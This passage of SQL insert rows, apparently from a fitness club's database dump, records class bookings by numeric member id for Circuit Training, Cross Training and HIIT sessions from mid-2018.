(13622, 365, 'CTR', '2018-10-03', '20h00', '21h00', 'Cross Training'),
(13621, 165, 'CTR', '2018-10-03', '20h00', '21h00', 'Cross Training'),
(13620, 323, 'CTR', '2018-10-03', '20h00', '21h00', 'Cross Training'),
(13619, 132, 'CTR', '2018-10-03', '20h00', '21h00', 'Cross Training'),
(13618, 339, 'CTR', '2018-10-03', '19h00', '20h00', 'Circuit Training'),
(13617, 348, 'CTR', '2018-10-03', '19h00', '20h00', 'Circuit Training'),
(13616, 348, 'CTR', '2018-10-03', '19h00', '20h00', 'Circuit Training'),
(13615, 310, 'CTR', '2018-10-03', '19h00', '20h00', 'Circuit Training'),
(13614, 247, 'CTR', '2018-10-03', '19h00', '20h00', 'Circuit Training'),
(13613, 177, 'CTR', '2018-10-03', '18h00', '19h00', 'Circuit Training'),
(13612, 231, 'CTR', '2018-10-03', '18h00', '19h00', 'Circuit Training'),
(13611, 138, 'CTR', '2018-10-03', '18h00', '19h00', 'Circuit Training'),
(13609, 103, 'CTR', '2018-09-26', '18h00', '19h00', 'Circuit Training'),
(13636, 294, 'CTR', '2018-10-03', '19h00', '20h00', 'Circuit Training'),
(13607, 180, 'CTR', '2018-09-27', '18h30', '19h30', 'Circuit Training'),
(13605, 132, 'CTR', '2018-10-01', '18h00', '19h00', 'Cross Training'),
(13580, 138, 'CTR', '2018-09-26', '18h00', '19h00', 'Circuit Training'),
(13579, 292, 'CTR', '2018-09-24', '18h00', '19h00', 'Cross Training'),
(13578, 365, 'CTR', '2018-09-26', '20h00', '21h00', 'Cross Training'),
(13577, 132, 'CTR', '2018-09-26', '20h00', '21h00', 'Cross Training'),
(13576, 165, 'CTR', '2018-09-26', '20h00', '21h00', 'Cross Training'),
(13575, 323, 'CTR', '2018-09-26', '20h00', '21h00', 'Cross Training'),
(13582, 92, 'CTR', '2018-09-24', '18h00', '19h00', 'Cross Training'),
(13573, 348, 'CTR', '2018-09-26', '19h00', '20h00', 'Circuit Training'),
(13572, 348, 'CTR', '2018-09-26', '19h00', '20h00', 'Circuit Training'),
(13571, 318, 'CTR', '2018-09-26', '19h00', '20h00', 'Circuit Training'),
(13570, 310, 'CTR', '2018-09-26', '19h00', '20h00', 'Circuit Training'),
(13569, 247, 'CTR', '2018-09-26', '19h00', '20h00', 'Circuit Training'),
(13568, 231, 'CTR', '2018-09-26', '18h00', '19h00', 'Circuit Training'),
(13567, 177, 'CTR', '2018-09-26', '18h00', '19h00', 'Circuit Training'),
(13610, 344, 'CTR', '2018-09-27', '18h30', '19h30', 'Circuit Training'),
(13606, 344, 'CTR', '2018-10-03', '20h00', '21h00', 'Cross Training'),
(13564, 255, 'CTR', '2018-09-24', '18h00', '19h00', 'Cross Training'),
(13581, 205, 'CTR', '2018-09-26', '18h00', '19h00', 'Circuit Training'),
(13562, 210, 'CTR', '2018-09-19', '19h00', '20h00', 'Circuit Training'),
(13560, 173, 'CTR', '2018-10-03', '19h00', '20h00', 'Circuit Training'),
(13559, 173, 'CTR', '2018-09-26', '19h00', '20h00', 'Circuit Training'),
(13558, 344, 'CTR', '2018-09-26', '18h00', '19h00', 'Circuit Training'),
(13557, 80, 'CTR', '2018-09-17', '19h00', '20h00', 'Cross Training'),
(13555, 292, 'CTR', '2018-09-17', '18h00', '19h00', 'Cross Training'),
(13554, 255, 'CTR', '2018-09-17', '18h00', '19h00', 'Cross Training'),
(13553, 138, 'CTR', '2018-09-17', '18h00', '19h00', 'Cross Training'),
(13552, 231, 'CTR', '2018-09-19', '18h00', '19h00', 'Circuit Training'),
(13549, 344, 'CTR', '2018-09-19', '20h00', '21h00', 'Cross Training'),
(13548, 323, 'CTR', '2018-09-19', '20h00', '21h00', 'Cross Training'),
(13547, 165, 'CTR', '2018-09-19', '20h00', '21h00', 'Cross Training'),
(13546, 348, 'CTR', '2018-09-19', '19h00', '20h00', 'Circuit Training'),
(13545, 348, 'CTR', '2018-09-19', '19h00', '20h00', 'Circuit Training'),
(13544, 310, 'CTR', '2018-09-19', '19h00', '20h00', 'Circuit Training'),
(13543, 247, 'CTR', '2018-09-19', '19h00', '20h00', 'Circuit Training'),
(13542, 173, 'CTR', '2018-09-19', '19h00', '20h00', 'Circuit Training'),
(13541, 177, 'CTR', '2018-09-19', '18h00', '19h00', 'Circuit Training'),
(13539, 31, 'CTR', '2018-09-19', '18h00', '19h00', 'Circuit Training'),
(13561, 103, 'CTR', '2018-09-19', '20h00', '21h00', 'Cross Training'),
(13537, 260, 'CTR', '2018-09-17', '18h00', '19h00', 'Cross Training'),
(13536, 350, 'CTR', '2018-09-17', '18h00', '19h00', 'Cross Training'),
(13535, 351, 'CTR', '2018-09-17', '18h00', '19h00', 'Cross Training'),
(13534, 230, 'CTR', '2018-09-17', '19h00', '20h00', 'Cross Training'),
(13533, 230, 'CTR', '2018-09-19', '19h00', '20h00', 'Circuit Training'),
(13532, 231, 'CTR', '2018-09-12', '18h00', '19h00', 'Circuit Training'),
(13530, 294, 'CTR', '2018-09-19', '20h00', '21h00', 'Cross Training'),
(13529, 350, 'CTR', '2018-09-10', '18h00', '19h00', 'Cross Training'),
(13528, 351, 'CTR', '2018-09-10', '18h00', '19h00', 'Cross Training'),
(13527, 231, 'CTR', '2018-09-10', '18h00', '19h00', 'Cross Training'),
(13526, 180, 'CTR', '2018-09-10', '19h00', '20h00', 'Cross Training'),
(13525, 304, 'CTR', '2018-09-10', '18h00', '19h00', 'Cross Training'),
(13524, 323, 'CTR', '2018-09-12', '20h00', '21h00', 'Cross Training'),
(13523, 165, 'CTR', '2018-09-12', '20h00', '21h00', 'Cross Training'),
(13522, 294, 'CTR', '2018-09-10', '18h00', '19h00', 'Cross Training'),
(13556, 363, 'CTR', '2018-09-17', '19h00', '20h00', 'Cross Training'),
(13520, 230, 'CTR', '2018-09-12', '20h00', '21h00', 'Cross Training'),
(13519, 230, 'CTR', '2018-09-10', '19h00', '20h00', 'Cross Training'),
(13518, 177, 'CTR', '2018-09-12', '18h00', '19h00', 'Circuit Training'),
(13517, 205, 'CTR', '2018-09-10', '20h00', '21h00', 'Circuit Training'),
(13551, 138, 'CTR', '2018-09-24', '18h00', '19h00', 'Cross Training'),
(13515, 138, 'CTR', '2018-09-10', '18h00', '19h00', 'Cross Training'),
(13514, 210, 'CTR', '2018-09-10', '19h00', '20h00', 'Cross Training'),
(13513, 255, 'CTR', '2018-09-10', '18h00', '19h00', 'Cross Training'),
(13512, 132, 'CTR', '2018-09-19', '20h00', '21h00', 'Cross Training'),
(13511, 132, 'CTR', '2018-09-17', '18h00', '19h00', 'Cross Training'),
(13509, 344, 'CTR', '2018-09-12', '18h00', '19h00', 'Circuit Training'),
(13508, 31, 'CTR', '2018-09-12', '19h00', '20h00', 'Circuit Training'),
(13507, 348, 'CTR', '2018-09-12', '19h00', '20h00', 'Circuit Training'),
(13506, 348, 'CTR', '2018-09-12', '19h00', '20h00', 'Circuit Training'),
(13505, 318, 'CTR', '2018-09-12', '19h00', '20h00', 'Circuit Training'),
(13504, 310, 'CTR', '2018-09-12', '19h00', '20h00', 'Circuit Training'),
(13503, 247, 'CTR', '2018-09-12', '19h00', '20h00', 'Circuit Training'),
(13502, 173, 'CTR', '2018-09-12', '19h00', '20h00', 'Circuit Training'),
(13603, 231, 'CTR', '2018-10-01', '18h00', '19h00', 'Cross Training'),
(13589, 103, 'CTR', '2018-09-24', '19h00', '20h00', 'Cross Training'),
(13590, 351, 'CTR', '2018-09-24', '18h00', '19h00', 'Cross Training'),
(13591, 350, 'CTR', '2018-09-24', '18h00', '19h00', 'Cross Training'),
(13592, 260, 'CTR', '2018-09-24', '18h00', '19h00', 'Cross Training'),
(13593, 205, 'CTR', '2018-09-24', '18h00', '19h00', 'Cross Training'),
(13510, 339, 'CTR', '2018-09-26', '19h00', '20h00', 'Circuit Training'),
(13595, 132, 'CTR', '2018-09-24', '18h00', '19h00', 'Cross Training'),
(13596, 367, 'CTR', '2018-09-27', '18h30', '19h30', 'Circuit Training'),
(13597, 92, 'CTR', '2018-10-01', '18h00', '19h00', 'Cross Training'),
(13598, 138, 'CTR', '2018-10-01', '18h00', '19h00', 'Cross Training'),
(13627, 344, 'CTR', '2018-10-01', '18h00', '19h00', 'Cross Training'),
(13600, 351, 'CTR', '2018-10-01', '18h00', '19h00', 'Cross Training'),
(13601, 350, 'CTR', '2018-10-01', '18h00', '19h00', 'Cross Training'),
(13628, 205, 'CTR', '2018-10-01', '19h00', '20h00', 'Cross Training'),
(13498, 339, 'CTR', '2018-09-12', '19h00', '20h00', 'Circuit Training'),
(13583, 365, 'CTR', '2018-09-24', '19h00', '20h00', 'Cross Training'),
(13584, 180, 'CTR', '2018-09-24', '19h00', '20h00', 'Cross Training'),
(13594, 231, 'CTR', '2018-09-24', '18h00', '19h00', 'Cross Training'),
(13586, 366, 'CTR', '2018-09-24', '19h00', '20h00', 'Cross Training'),
(13587, 363, 'CTR', '2018-09-24', '19h00', '20h00', 'Cross Training'),
(13464, 80, 'CTR', '2018-07-11', '18h30', '19h30', 'Circuit Training Outdoor'),
(13463, 132, 'CTR', '2018-07-11', '18h30', '19h30', 'Circuit Training Outdoor'),
(13462, 358, 'CTR', '2018-07-11', '18h30', '19h30', 'Circuit Training Outdoor'),
(13461, 306, 'CTR', '2018-07-11', '18h30', '19h30', 'Circuit Training Outdoor'),
(13466, 301, 'CTR', '2018-07-11', '18h30', '19h30', 'Circuit Training Outdoor'),
(13450, 180, 'CTR', '2018-07-04', '18h30', '19h30', 'Circuit Training Outdoor'),
(13449, 205, 'CTR', '2018-07-04', '19h30', '20h30', 'Circuit training Outdoor'),
(13448, 80, 'CTR', '2018-07-04', '19h30', '20h30', 'Circuit training Outdoor'),
(13447, 90, 'CTR', '2018-07-04', '19h30', '20h30', 'Circuit training Outdoor'),
(13446, 247, 'CTR', '2018-07-04', '19h30', '20h30', 'Circuit training Outdoor'),
(13445, 318, 'CTR', '2018-07-04', '19h30', '20h30', 'Circuit training Outdoor'),
(13444, 348, 'CTR', '2018-07-04', '19h30', '20h30', 'Circuit training Outdoor'),
(13443, 348, 'CTR', '2018-07-04', '19h30', '20h30', 'Circuit training Outdoor'),
(13442, 306, 'CTR', '2018-07-04', '19h30', '20h30', 'Circuit training Outdoor'),
(13441, 301, 'CTR', '2018-07-04', '19h30', '20h30', 'Circuit training Outdoor'),
(13440, 132, 'CTR', '2018-07-04', '19h30', '20h30', 'Circuit training Outdoor'),
(13459, 48, 'CTR', '2018-07-11', '18h30', '19h30', 'Circuit Training Outdoor'),
(13604, 255, 'CTR', '2018-10-01', '18h00', '19h00', 'Cross Training'),
(13438, 48, 'CTR', '2018-07-04', '18h30', '19h30', 'Circuit Training Outdoor'),
(13437, 230, 'CTR', '2018-07-04', '18h30', '19h30', 'Circuit Training Outdoor'),
(13457, 294, 'CTR', '2018-07-11', '18h30', '19h30', 'Circuit Training Outdoor'),
(13435, 349, 'CTR', '2018-07-04', '18h30', '19h30', 'Circuit Training Outdoor'),
(13434, 80, 'CTR', '2018-07-04', '18h30', '19h30', 'Circuit Training Outdoor'),
(13433, 314, 'CTR', '2018-07-04', '18h30', '19h30', 'Circuit Training Outdoor'),
(13432, 92, 'CTR', '2018-07-04', '18h30', '19h30', 'Circuit Training Outdoor'),
(13431, 231, 'CTR', '2018-07-04', '18h30', '19h30', 'Circuit Training Outdoor'),
(13430, 265, 'CTR', '2018-07-04', '18h30', '19h30', 'Circuit Training Outdoor'),
(13429, 350, 'CTR', '2018-07-04', '18h30', '19h30', 'Circuit Training Outdoor'),
(13458, 230, 'CTR', '2018-07-11', '18h30', '19h30', 'Circuit Training Outdoor'),
(13427, 351, 'CTR', '2018-07-04', '18h30', '19h30', 'Circuit Training Outdoor'),
(13426, 344, 'CTR', '2018-07-04', '18h30', '19h30', 'Circuit Training Outdoor'),
(13425, 294, 'CTR', '2018-07-04', '18h30', '19h30', 'Circuit Training Outdoor'),
(13424, 255, 'CTR', '2018-07-04', '18h30', '19h30', 'Circuit Training Outdoor'),
(13423, 342, 'CTR', '2018-06-28', '18h45', '19h15', 'Circuit Training'),
(13421, 350, 'CTR', '2018-06-25', '17h30', '18h00', 'Circuit Training'),
(13420, 356, 'CTR', '2018-06-25', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(13419, 356, 'CTR', '2018-06-25', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(13403, 344, 'CTR', '2018-06-22', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(13417, 231, 'CTR', '2018-06-25', '17h30', '18h00', 'Circuit Training'),
(13416, 80, 'CTR', '2018-06-25', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(11567, 3, 'CTR', '2017-12-15', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(11553, 310, 'CTR', '2017-12-13', '18h45', '19h15', 'Circuit training'),
(13415, 80, 'CTR', '2018-06-25', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13414, 314, 'CTR', '2018-06-25', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(13413, 314, 'CTR', '2018-06-25', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13412, 48, 'CTR', '2018-06-25', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(13411, 280, 'CTR', '2018-06-25', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(13410, 132, 'CTR', '2018-06-25', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(13409, 281, 'CTR', '2018-06-25', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(13408, 281, 'CTR', '2018-06-25', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(13407, 92, 'CTR', '2018-06-25', '17h30', '18h00', 'Circuit Training'),
(13406, 80, 'CTR', '2018-06-25', '17h30', '18h00', 'Circuit Training'),
(13418, 351, 'CTR', '2018-06-25', '17h30', '18h00', 'Circuit Training'),
(13402, 105, 'CTR', '2018-06-28', '18h45', '19h15', 'Circuit Training'),
(13401, 322, 'CTR', '2018-06-28', '18h45', '19h15', 'Circuit Training'),
(13399, 80, 'CTR', '2018-06-21', '18h45', '19h15', 'Circuit Training'),
(13398, 340, 'CTR', '2018-06-21', '18h45', '19h15', 'Circuit Training'),
(13397, 255, 'CTR', '2018-06-25', '17h30', '18h00', 'Circuit Training'),
(13396, 344, 'CTR', '2018-06-25', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(13395, 344, 'CTR', '2018-06-25', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(13367, 294, 'CTR', '2018-06-18', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(13366, 294, 'CTR', '2018-06-18', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(13365, 132, 'CTR', '2018-06-18', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(13370, 294, 'CTR', '2018-06-25', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(13371, 294, 'CTR', '2018-06-27', '20h30', '21h00', 'Circuit training'),
(13400, 326, 'CTR', '2018-06-28', '18h45', '19h15', 'Circuit Training'),
(13360, 48, 'CTR', '2018-06-21', '18h45', '19h15', 'Circuit Training'),
(13359, 326, 'CTR', '2018-06-21', '18h45', '19h15', 'Circuit Training'),
(13358, 322, 'CTR', '2018-06-21', '18h45', '19h15', 'Circuit Training'),
(13355, 344, 'CTR', '2018-06-29', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(13354, 344, 'CTR', '2018-06-27', '20h30', '21h00', 'Circuit training'),
(13353, 205, 'CTR', '2018-06-20', '20h30', '21h00', 'Circuit training'),
(13352, 80, 'CTR', '2018-06-20', '20h30', '21h00', 'Circuit training'),
(13351, 357, 'CTR', '2018-06-20', '20h30', '21h00', 'Circuit training'),
(13350, 344, 'CTR', '2018-06-20', '20h30', '21h00', 'Circuit training'),
(13349, 132, 'CTR', '2018-06-20', '20h30', '21h00', 'Circuit training'),
(13348, 171, 'CTR', '2018-06-20', '20h30', '21h00', 'Circuit training'),
(13347, 165, 'CTR', '2018-06-20', '20h30', '21h00', 'Circuit training'),
(13346, 323, 'CTR', '2018-06-20', '20h30', '21h00', 'Circuit training'),
(13345, 348, 'CTR', '2018-06-20', '18h45', '19h15', 'Circuit training'),
(13344, 348, 'CTR', '2018-06-20', '18h45', '19h15', 'Circuit training'),
(13343, 173, 'CTR', '2018-06-20', '18h45', '19h15', 'Circuit training'),
(13342, 230, 'CTR', '2018-06-20', '18h45', '19h15', 'Circuit training'),
(13341, 339, 'CTR', '2018-06-20', '18h45', '19h15', 'Circuit training'),
(13369, 294, 'CTR', '2018-06-25', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13339, 48, 'CTR', '2018-06-20', '18h45', '19h15', 'Circuit training'),
(13338, 310, 'CTR', '2018-06-20', '18h45', '19h15', 'Circuit training'),
(13337, 247, 'CTR', '2018-06-20', '18h45', '19h15', 'Circuit training'),
(13336, 80, 'CTR', '2018-06-20', '18h00', '18h30', 'Circuit Training'),
(13335, 80, 'CTR', '2018-06-20', '18h00', '18h30', 'Circuit Training'),
(13334, 80, 'CTR', '2018-06-20', '18h00', '18h30', 'Circuit Training'),
(13333, 80, 'CTR', '2018-06-20', '18h00', '18h30', 'Circuit Training'),
(13332, 359, 'CTR', '2018-06-20', '18h00', '18h30', 'Circuit Training'),
(13331, 360, 'CTR', '2018-06-20', '18h00', '18h30', 'Circuit Training'),
(13330, 343, 'CTR', '2018-06-20', '18h00', '18h30', 'Circuit Training'),
(13329, 140, 'CTR', '2018-06-20', '18h00', '18h30', 'Circuit Training'),
(13328, 349, 'CTR', '2018-06-20', '18h00', '18h30', 'Circuit Training'),
(13327, 350, 'CTR', '2018-06-20', '18h00', '18h30', 'Circuit Training'),
(13326, 231, 'CTR', '2018-06-20', '18h00', '18h30', 'Circuit Training'),
(13323, 171, 'CTR', '2018-06-13', '20h30', '21h00', 'Circuit training'),
(13322, 205, 'CTR', '2018-06-13', '20h30', '21h00', 'Circuit training'),
(13321, 48, 'CTR', '2018-06-14', '18h45', '19h15', 'Circuit Training'),
(13422, 325, 'CTR', '2018-06-28', '18h45', '19h15', 'Circuit Training'),
(13391, 306, 'CTR', '2018-06-25', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(13392, 301, 'CTR', '2018-06-25', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(13393, 301, 'CTR', '2018-06-25', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(13368, 132, 'CTR', '2018-06-18', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(13373, 48, 'CTR', '2018-06-18', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(13374, 48, 'CTR', '2018-06-18', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(13362, 280, 'CTR', '2018-06-18', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(13363, 280, 'CTR', '2018-06-18', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(13389, 48, 'CTR', '2018-06-25', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13390, 306, 'CTR', '2018-06-25', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(13388, 280, 'CTR', '2018-06-25', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13356, 138, 'CTR', '2018-06-21', '18h45', '19h15', 'Circuit Training'),
(13357, 105, 'CTR', '2018-06-21', '18h45', '19h15', 'Circuit Training'),
(13382, 138, 'CTR', '2018-06-18', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(13378, 306, 'CTR', '2018-06-18', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(13379, 306, 'CTR', '2018-06-18', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(13381, 138, 'CTR', '2018-06-18', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(13383, 188, 'CTR', '2018-06-21', '18h45', '19h15', 'Circuit Training'),
(13384, 188, 'CTR', '2018-06-21', '18h45', '19h15', 'Circuit Training'),
(13385, 358, 'CTR', '2018-06-25', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(13386, 358, 'CTR', '2018-06-25', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(13405, 355, 'CTR', '2018-06-25', '17h30', '18h00', 'Circuit Training'),
(13299, 358, 'CTR', '2018-06-18', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(13298, 358, 'CTR', '2018-06-18', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(13375, 265, 'CTR', '2018-06-18', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(13376, 265, 'CTR', '2018-06-18', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(13296, 358, 'CTR', '2018-06-11', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(13295, 358, 'CTR', '2018-06-11', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(13294, 265, 'CTR', '2018-06-11', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(13293, 265, 'CTR', '2018-06-11', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(13292, 306, 'CTR', '2018-06-11', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(13291, 306, 'CTR', '2018-06-11', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(13286, 280, 'CTR', '2018-06-11', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13285, 205, 'CTR', '2018-06-11', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(13284, 205, 'CTR', '2018-06-11', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13283, 80, 'CTR', '2018-06-11', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(13282, 80, 'CTR', '2018-06-11', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13281, 80, 'CTR', '2018-06-11', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(13280, 80, 'CTR', '2018-06-11', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13279, 314, 'CTR', '2018-06-11', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(13278, 314, 'CTR', '2018-06-11', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13276, 294, 'CTR', '2018-06-22', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(13275, 294, 'CTR', '2018-06-20', '20h30', '21h00', 'Circuit training'),
(13394, 132, 'CTR', '2018-06-25', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13272, 80, 'CTR', '2018-06-13', '18h00', '18h30', 'Circuit Training'),
(13271, 80, 'CTR', '2018-06-13', '18h00', '18h30', 'Circuit Training'),
(13270, 3, 'CTR', '2018-06-15', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(13269, 180, 'CTR', '2018-06-15', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(13268, 205, 'CTR', '2018-06-15', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(13267, 230, 'CTR', '2018-06-15', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(13324, 205, 'CTR', '2018-06-14', '18h45', '19h15', 'Circuit Training'),
(13325, 92, 'CTR', '2018-06-20', '18h00', '18h30', 'Circuit Training'),
(13265, 353, 'CTR', '2018-06-15', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(13264, 294, 'CTR', '2018-06-13', '20h30', '21h00', 'Circuit training'),
(13263, 294, 'CTR', '2018-06-15', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(13262, 342, 'CTR', '2018-06-14', '18h45', '19h15', 'Circuit Training'),
(13261, 105, 'CTR', '2018-06-14', '18h45', '19h15', 'Circuit Training'),
(13260, 326, 'CTR', '2018-06-14', '18h45', '19h15', 'Circuit Training'),
(13259, 322, 'CTR', '2018-06-14', '18h45', '19h15', 'Circuit Training'),
(13258, 3, 'CTR', '2018-06-08', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(13257, 180, 'CTR', '2018-06-08', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(13256, 132, 'CTR', '2018-06-08', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(13255, 230, 'CTR', '2018-06-08', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(13254, 31, 'CTR', '2018-06-08', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(13253, 48, 'CTR', '2018-06-08', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(13252, 357, 'CTR', '2018-06-13', '20h30', '21h00', 'Circuit training'),
(13251, 323, 'CTR', '2018-06-13', '20h30', '21h00', 'Circuit training'),
(13250, 165, 'CTR', '2018-06-13', '20h30', '21h00', 'Circuit training'),
(13249, 132, 'CTR', '2018-06-13', '20h30', '21h00', 'Circuit training'),
(13247, 31, 'CTR', '2018-06-13', '18h45', '19h15', 'Circuit training'),
(13248, 80, 'CTR', '2018-06-13', '20h30', '21h00', 'Circuit training'),
(13246, 48, 'CTR', '2018-06-13', '18h45', '19h15', 'Circuit training'),
(13245, 230, 'CTR', '2018-06-13', '18h45', '19h15', 'Circuit training'),
(13244, 310, 'CTR', '2018-06-13', '18h45', '19h15', 'Circuit training'),
(13243, 247, 'CTR', '2018-06-13', '18h45', '19h15', 'Circuit training'),
(13242, 348, 'CTR', '2018-06-13', '18h45', '19h15', 'Circuit training'),
(13241, 348, 'CTR', '2018-06-13', '18h45', '19h15', 'Circuit training'),
(13240, 339, 'CTR', '2018-06-13', '18h45', '19h15', 'Circuit training'),
(13307, 138, 'CTR', '2018-06-14', '18h45', '19h15', 'Circuit Training'),
(13238, 359, 'CTR', '2018-06-13', '18h00', '18h30', 'Circuit Training'),
(13237, 360, 'CTR', '2018-06-13', '18h00', '18h30', 'Circuit Training'),
(13236, 80, 'CTR', '2018-06-13', '18h00', '18h30', 'Circuit Training'),
(13235, 80, 'CTR', '2018-06-13', '18h00', '18h30', 'Circuit Training'),
(13234, 350, 'CTR', '2018-06-13', '18h00', '18h30', 'Circuit Training'),
(13232, 231, 'CTR', '2018-06-13', '18h00', '18h30', 'Circuit Training'),
(13233, 349, 'CTR', '2018-06-13', '18h00', '18h30', 'Circuit Training'),
(13230, 92, 'CTR', '2018-06-13', '18h00', '18h30', 'Circuit Training'),
(13229, 325, 'CTR', '2018-06-07', '18h45', '19h15', 'Circuit Training'),
(13228, 322, 'CTR', '2018-06-07', '18h45', '19h15', 'Circuit Training'),
(13226, 326, 'CTR', '2018-06-07', '18h45', '19h15', 'Circuit Training'),
(13227, 342, 'CTR', '2018-06-07', '18h45', '19h15', 'Circuit Training'),
(13225, 344, 'CTR', '2018-06-13', '20h30', '21h00', 'Circuit training'),
(13224, 344, 'CTR', '2018-06-15', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(13223, 344, 'CTR', '2018-06-11', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(13222, 344, 'CTR', '2018-06-11', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13220, 138, 'CTR', '2018-06-06', '18h00', '18h30', 'Circuit Training'),
(13289, 301, 'CTR', '2018-06-11', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(13290, 301, 'CTR', '2018-06-11', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(13288, 280, 'CTR', '2018-06-11', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(13217, 132, 'CTR', '2018-06-11', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(13216, 132, 'CTR', '2018-06-11', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13215, 48, 'CTR', '2018-06-11', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(13214, 48, 'CTR', '2018-06-11', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13213, 279, 'CTR', '2018-06-11', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(13212, 279, 'CTR', '2018-06-11', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13211, 294, 'CTR', '2018-06-11', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(13209, 80, 'CTR', '2018-06-11', '17h30', '18h00', 'Circuit Training'),
(13208, 350, 'CTR', '2018-06-11', '17h30', '18h00', 'Circuit Training'),
(13277, 355, 'CTR', '2018-06-11', '17h30', '18h00', 'Circuit Training'),
(13206, 349, 'CTR', '2018-06-11', '17h30', '18h00', 'Circuit Training'),
(13203, 92, 'CTR', '2018-06-11', '17h30', '18h00', 'Circuit Training'),
(13202, 231, 'CTR', '2018-06-11', '17h30', '18h00', 'Circuit Training'),
(13192, 280, 'CTR', '2018-06-04', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(13191, 280, 'CTR', '2018-06-04', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(13190, 357, 'CTR', '2018-06-06', '20h30', '21h00', 'Circuit training'),
(13189, 132, 'CTR', '2018-06-06', '20h30', '21h00', 'Circuit training'),
(13221, 280, 'CTR', '2018-06-06', '20h30', '21h00', 'Circuit training'),
(13187, 165, 'CTR', '2018-06-06', '20h30', '21h00', 'Circuit training'),
(13186, 294, 'CTR', '2018-06-06', '20h30', '21h00', 'Circuit training'),
(13185, 80, 'CTR', '2018-06-06', '18h00', '18h30', 'Circuit Training'),
(13184, 80, 'CTR', '2018-06-06', '18h00', '18h30', 'Circuit Training'),
